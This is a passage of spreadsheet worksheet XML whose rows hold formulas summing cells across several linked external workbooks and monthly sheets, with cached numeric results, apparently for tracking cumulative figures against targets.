        <f>'[10]12'!$E$24+'[11]12'!$E$19+'[12]12'!$E$20+'[13]12'!$E$27+'[14]12'!$E$11+'[14]12'!$E$18+'[15]12'!$E$10</f>
        <v>13377</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'11'!H9</f>
        <v>186775</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4322163.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]12'!$I$24+'[11]12'!$I$19+'[12]12'!$I$20+'[13]12'!$I$27+'[14]12'!$E$26+'[14]12'!$E$33+'[15]12'!$H$10</f>
        <v>15015.43</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'11'!K9</f>
        <v>184667.099</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4282145.91</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]12'!$L$24+'[11]12'!$L$19+'[12]12'!$L$20+'[13]12'!$L$27+'[14]12'!$H$26+'[14]12'!$H$33+'[15]12'!$K$10</f>
        <v>112973.613</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]12'!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]12'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]12'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]12'!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]12'!$U$109</f>
        <v>30.6111111111111</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]12'!$V$109</f>
        <v>34.727239884393</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]12'!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]12'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]12'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]12'!$D$25+'[11]12'!$D$20+'[12]12'!$D$21+'[13]12'!$D$28+'[14]12'!$D$12+'[14]12'!$D$19+'[15]12'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]12'!$E$25+'[11]12'!$E$20+'[12]12'!$E$21+'[13]12'!$E$28+'[14]12'!$E$12+'[14]12'!$E$19+'[15]12'!$E$11</f>
        <v>1550</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'11'!H10</f>
        <v>25630</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>943157.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]12'!$I$25+'[11]12'!$I$20+'[12]12'!$I$21+'[13]12'!$I$28+'[14]12'!$E$27+'[14]12'!$E$34+'[15]12'!$H$11</f>
        <v>2787.1</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'11'!K10</f>
        <v>34735.4</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>931964.12</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]12'!$L$25+'[11]12'!$L$20+'[12]12'!$L$21+'[13]12'!$L$28+'[14]12'!$H$27+'[14]12'!$H$34+'[15]12'!$K$11</f>
        <v>52101.542</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]12'!$W$110</f>
        <v>244.86036838978</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]12'!$X$110</f>
        <v>255.766666666667</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]12'!$Y$110</f>
        <v>268.438294920219</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]12'!$T$110</f>
        <v>70.125</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]12'!$U$110</f>
        <v>31.25</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]12'!$V$110</f>
        <v>34.3697013487475</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]12'!$Q$110</f>
        <v>16.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]12'!$R$110</f>
        <v>90</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]12'!$S$110</f>
        <v>2854.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]12'!$D$26+'[11]12'!$D$21+'[12]12'!$D$19+'[13]12'!$D$29+'[14]12'!$D$13+'[14]12'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]12'!$E$26+'[11]12'!$E$21+'[12]12'!$E$19+'[13]12'!$E$29+'[14]12'!$E$13+'[14]12'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'11'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]12'!$I$26+'[11]12'!$I$21+'[12]12'!$I$19+'[13]12'!$I$29+'[14]12'!$E$28+'[14]12'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'11'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]12'!$L$26+'[11]12'!$L$21+'[12]12'!$L$19+'[13]12'!$L$29+'[14]12'!$H$28+'[14]12'!$H$35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6569.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'11'!H12</f>
        <v>116215</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5058606.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>19075.267</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'11'!K12</f>
        <v>213795.228</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5242901.604</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>303194.87700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>69.0648922551368</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]12'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]12'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]12'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]12'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]12'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]12'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]12'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]12'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]12'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'11'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'11'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>55.632087522945</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]12'!$W$68</f>
        <v>273.708333333333</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]12'!$X$68</f>
        <v>265.123762376238</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]12'!$Y$68</f>
        <v>266.339370074762</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]12'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]12'!$U$68</f>
        <v>70.1388888888889</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]12'!$V$68</f>
        <v>71.5020472061657</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]12'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]12'!$R$68</f>
        <v>202.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]12'!$S$68</f>
        <v>5937.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>670</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'11'!H14</f>
        <v>28475</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>993018.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5874.51</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'11'!K14</f>
        <v>64135.605</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1857079.711</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>64232.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]12'!$W$71</f>
        <v>208.526315789474</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]12'!$X$71</f>
        <v>218.979527559055</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]12'!$Y$71</f>
        <v>213.708320888836</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]12'!$T$71</f>
        <v>39.5833333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]12'!$U$71</f>
        <v>55.1215277777778</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]12'!$V$71</f>
        <v>50.4004094412331</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]12'!$Q$71</f>
        <v>9.50</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]12'!$R$71</f>
        <v>158.75</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]12'!$S$71</f>
        <v>4185.25</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'11'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>2349.357</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'11'!K15</f>
        <v>4620.633</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119377.133</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]12'!$W$72</f>
        <v>58.4583333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]12'!$X$72</f>
        <v>64.7674483685006</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]12'!$Y$72</f>
        <v>61.430788030618</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]12'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]12'!$U$72</f>
        <v>62.0381944444444</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]12'!$V$72</f>
        <v>51.1460741811175</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]12'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]12'!$R$72</f>
        <v>178.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]12'!$S$72</f>
        <v>4247.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'11'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'11'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]12'!$W$73</f>
        <v>55.9583333333333</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]12'!$X$73</f>
        <v>62.3495830301674</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]12'!$Y$73</f>
        <v>62.8936679406064</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]12'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]12'!$U$73</f>
        <v>62.0381944444444</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]12'!$V$73</f>
        <v>52.6840077071291</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]12'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]12'!$R$73</f>
        <v>178.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]12'!$S$73</f>
        <v>4374.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'11'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'11'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]12'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]12'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]12'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]12'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]12'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]12'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]12'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]12'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]12'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'11'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'11'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]12'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]12'!$X$74</f>
        <v>216.7</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]12'!$Y$74</f>
        <v>222.208856735346</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]12'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]12'!$U$74</f>
        <v>6.94444444444444</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]12'!$V$74</f>
        <v>7.00782755298651</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]12'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]12'!$R$74</f>
        <v>20</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]12'!$S$74</f>
        <v>581.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'11'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'11'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]12'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]12'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]12'!$Y$72</f>
        <v>9.12181303116147e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]12'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]12'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]12'!$V$72</f>
        <v>4.2509633911368e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]12'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]12'!$R$72</f>
        <v>1.2e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]12'!$S$72</f>
        <v>0.000353</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'11'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'11'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]12'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]12'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]12'!$Y$73</f>
        <v>239.299857573279</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]12'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]12'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]12'!$V$73</f>
        <v>69.6258472182081</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]12'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]12'!$R$73</f>
        <v>1.2e-5</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]12'!$S$73</f>
        <v>5781.730353</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]12'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]12'!$E$22</f>
        <v>7246</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'11'!H21</f>
        <v>81934</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2191372</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]12'!$I$22</f>
        <v>8652.22</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'11'!K21</f>
        <v>96058.48</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2162512.48</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]12'!$L$22</f>
        <v>68928.83</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>146.657085106383</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]12'!$W$81</f>
        <v>255.123561652617</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]12'!$X$81</f>
        <v>282.021186450263</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]12'!$Y$81</f>
        <v>275.938617570195</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]12'!$T$81</f>
        <v>36.1099537037037</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]12'!$U$81</f>
        <v>42.6384066358025</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]12'!$V$81</f>
        <v>36.3506977895526</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]12'!$Q$81</f>
        <v>8.66638888888889</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]12'!$R$81</f>
        <v>122.798611111111</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]12'!$S$81</f>
        <v>3018.56194444445</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]12'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]12'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'11'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]12'!$I$17</f>
        <v>7482.91</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'11'!K22</f>
        <v>80171.25</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1971632.63</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]12'!$L$17</f>
        <v>172455.102</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>86.227551</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]12'!$W$79</f>
        <v>106.896551724138</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]12'!$X$79</f>
        <v>100.485536989812</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]12'!$Y$79</f>
        <v>102.186366089972</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]12'!$T$79</f>
        <v>60.4166666666667</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]12'!$U$79</f>
        <v>54.7273341049383</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]12'!$V$79</f>
        <v>45.7029577445943</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]12'!$Q$79</f>
        <v>14.5</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]12'!$R$79</f>
        <v>157.614722222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]12'!$S$79</f>
        <v>3795.17361111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]12'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]12'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'11'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]12'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'11'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]12'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
